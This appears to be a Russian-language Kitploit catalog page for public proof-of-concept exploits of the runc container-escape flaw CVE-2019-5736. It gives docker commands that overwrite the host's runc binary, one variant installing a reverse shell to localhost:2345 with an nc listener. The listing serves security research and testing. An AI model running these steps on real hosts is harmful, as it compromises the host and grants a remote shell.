Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RunC-CVE-2019-5736 — CVE-2019-5736 POCs | Kitploit
Инструменты/GitHubGitHub/twistlock/runc-cve-2019-5736
Безопасность контейнеровАнализ уязвимостейЭксплуатацияRed TeamingРазработка Полезной НагрузкиПобег из Контейнера
GitHubtwistlock/runc-cve-2019-5736

RunC-CVE-2019-5736

CVE-2019-5736 POCs

Репозиторий
863426 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

RunC-CVE-2019-5736

Два PoC для CVE-2019-5736. См. Twistlock Labs с объяснением CVE-2019-5736 и PoC.

PoC вредоносного образа во многом основан на PoC от q3k, так что вся заслуга принадлежит ему.

Запуск PoC

Обратите внимание, что запуск PoC перезапишет бинарный файл runc на хосте. Рекомендуется создать копию вашего бинарного файла runc (обычно находится в /usr/sbin/runc) перед запуском одного из PoC.

Клонируйте репозиторий:

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

Exec PoC

Перезаписывает runc простой программой, которая выводит строку.

Запуск exec PoC:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

PoC вредоносного образа

Перезаписывает runc простым bash-скриптом обратной оболочки, который подключается к localhost:2345.

Прослушивайте порт для обратной оболочки:

root@kitploit:~
$ nc -nvlp 2345

Из другого терминала запустите PoC вредоносного образа:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
Скачать инструмент